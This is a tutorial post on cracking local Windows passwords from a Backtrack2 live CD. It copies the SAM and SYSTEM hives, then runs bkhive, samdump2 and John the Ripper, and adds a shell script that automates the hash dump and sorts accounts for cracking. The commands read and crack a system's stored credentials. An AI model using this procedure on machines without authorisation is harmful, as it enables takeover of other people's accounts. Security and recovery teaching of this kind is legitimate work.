Backtrack2 Homepage: http://www.remote-exploit.org/backtrack.html
Written by : Me (pavs)
Inspired By : http://www.neophob.com/serendipity/index.php?/archives/89-Crack-local-Windows-passwords-with-Backtrack-v1.x.html
One of several ways to recover the administrator password of a Windows system, if you have physical access to the machine, is to boot a live Linux distribution such as Backtrack2. Backtrack is a penetration-testing distro, so it comes loaded with tools for security testing of both local and remote systems.
This assumes the machine lets you boot from the CD and the BIOS is not password protected. There are ways around that too, but I won't cover them in this tutorial.
The first thing to do after booting into BT (Backtrack) is to open a shell window.
Our first job is to get at the partition that holds the Windows installation we are trying to crack. Backtrack has already mounted the partitions it found under /mnt (here the Windows partition is /mnt/hda2; the device name on your system may differ). Change into the registry hive directory and copy the SAM and SYSTEM hives to /tmp. These two files are locked while Windows is running, which is exactly why we are doing this from a live CD:
# cd /mnt/hda2/WINDOWS/system32/config
# cp SAM /tmp
# cp system /tmp
bkhive does not decrypt the SAM itself: it pulls the SYSKEY boot key out of the SYSTEM hive, and that key is what is needed to decrypt the hashes stored in the SAM. bkhive takes the hive and the output file as its two arguments, so we save the key to /tmp/key with this command:
# bkhive /tmp/system /tmp/key
Now we extract the password hashes from the SAM hive with samdump2, which takes the SAM and the key file from the previous step and writes one line per account in the pwdump format that John reads; we save that output as /tmp/hashes.txt.
This is what the hashes look like; obviously some information is blurred out.
Now we use the John the Ripper password cracker in incremental (brute-force) mode to crack the hashes. John is not the only program that cracks SAM hashes; there are other tools and other ways of doing it. This tutorial just demonstrates one of them.
In Backtrack2 it is located here, or from the shell you can change into its directory:
# cd /pentest/password/john-1.7.2/run
This is John cracking the password, with the command:
# john --incremental:all -f=NT /tmp/hashes.txt
This can take a very long time depending on your processor speed and the length and complexity of the password. Incremental mode tries every candidate, so before brute-forcing the NT hashes it is worth checking the dump for accounts that still store an LM hash (most XP installs do): LM splits the password into two 7-character case-folded halves and cracks far faster, with -f=LM instead of -f=NT.
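As an added example, not part of the original post, here is the whole procedure from copying the hives to picking the John format as one POSIX shell script, with a triage step the page does not show: it reads the pwdump-style lines samdump2 produces ("user:rid:LMhash:NThash:::") and flags empty passwords, accounts that still have an LM hash, and accounts with only an NT hash. The path arguments, the two well-known empty-password hash constants, the sample lines, the WIN_CONFIG_DIR variable and the script name are my assumptions, not anything from the page.

```shell
#!/bin/sh
# Added example, not from the original post: the tutorial's hive-to-hashes
# procedure as one script, plus a triage pass over the pwdump-style lines
# samdump2 writes ("user:rid:LMhash:NThash:::") before spending hours in john.
# Assumptions not taken from the page: the paths passed as arguments, the two
# well-known empty-password hash constants below, and the constructed SAMPLE.

EMPTY_LM="aad3b435b51404eeaad3b435b51404ee"   # LM field when LM storage is off or the password is empty
EMPTY_NT="31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty string

# Tutorial steps in order: copy SAM and SYSTEM out of the mounted Windows
# partition, recover the SYSKEY boot key with bkhive, then let samdump2 decrypt
# the SAM with that key and print one pwdump line per account into $3.
dump_hashes() {
    config_dir="$1"; work="$2"; out="$3"
    for t in bkhive samdump2; do
        command -v "$t" >/dev/null 2>&1 || { echo "$t not found in PATH" >&2; return 1; }
    done
    # The hive is "SYSTEM" on Windows; some mounts show it lower-case as on the page.
    sys="$config_dir/system"; [ -f "$sys" ] || sys="$config_dir/SYSTEM"
    cp "$config_dir/SAM" "$work/SAM" && cp "$sys" "$work/system" || return 1
    bkhive "$work/system" "$work/key" >/dev/null || return 1
    samdump2 "$work/SAM" "$work/key" > "$out" || return 1
}

# True when $1 is exactly 32 lower-case hex digits (one LM or NT hash).
is_hex32() {
    [ "${#1}" -eq 32 ] || return 1
    case "$1" in *[!0-9a-f]*) return 1 ;; esac
    return 0
}

# Verdict for one pwdump line:
#   blank     NT hash is the empty-string hash: empty password, nothing to crack
#   lm        a real LM hash is stored: crack with -f=LM first (two 7-char,
#             case-folded halves), far cheaper than the NT brute force
#   nt-only   LM field empty (LM storage disabled or password over 14 chars):
#             only the NT hash can be attacked
#   malformed not a user:rid:lm:nt::: line
classify_line() {
    lm=$(printf '%s\n' "$1" | cut -d: -f3 | tr 'A-F' 'a-f')
    nt=$(printf '%s\n' "$1" | cut -d: -f4 | tr 'A-F' 'a-f')
    if ! is_hex32 "$lm" || ! is_hex32 "$nt"; then echo malformed
    elif [ "$nt" = "$EMPTY_NT" ]; then echo blank
    elif [ "$lm" = "$EMPTY_LM" ]; then echo nt-only
    else echo lm
    fi
}

# LM if any account still stores an LM hash, otherwise NT (the page's choice).
recommend_format() {
    fmt=NT
    while IFS= read -r line; do
        if [ "$(classify_line "$line")" = lm ]; then fmt=LM; fi
    done < "$1"
    echo "$fmt"
}

# One "user verdict" line per account, then the john format to start with.
triage() {
    while IFS= read -r line; do
        printf '%s %s\n' "${line%%:*}" "$(classify_line "$line")"
    done < "$1"
    echo "start with: john --incremental:all -f=$(recommend_format "$1") $1"
}

# Constructed sample in samdump2's layout; the non-empty hashes are the
# well-known LM and NT hashes of the string "password".
SAMPLE='Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pavs:1003:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
svc:1004:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
not a hash line'
write_sample() { printf '%s\n' "$SAMPLE" > "$1"; }

# Real run on Backtrack (WIN_CONFIG_DIR is a hypothetical variable name):
#   WIN_CONFIG_DIR=/mnt/hda2/WINDOWS/system32/config sh sam_triage.sh
# Without it, the script only triages the constructed sample.
if [ -n "${WIN_CONFIG_DIR:-}" ]; then
    dump_hashes "$WIN_CONFIG_DIR" /tmp /tmp/hashes.txt && triage /tmp/hashes.txt
else
    f=$(mktemp); write_sample "$f"; triage "$f"; rm -f "$f"
fi
```

Without WIN_CONFIG_DIR set the script only runs over the constructed sample, so it can be tried before booting the target. On that sample it reports Administrator and Guest as blank, pavs as lm, svc as nt-only, the stray line as malformed, and recommends starting John with -f=LM.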
That's all for now.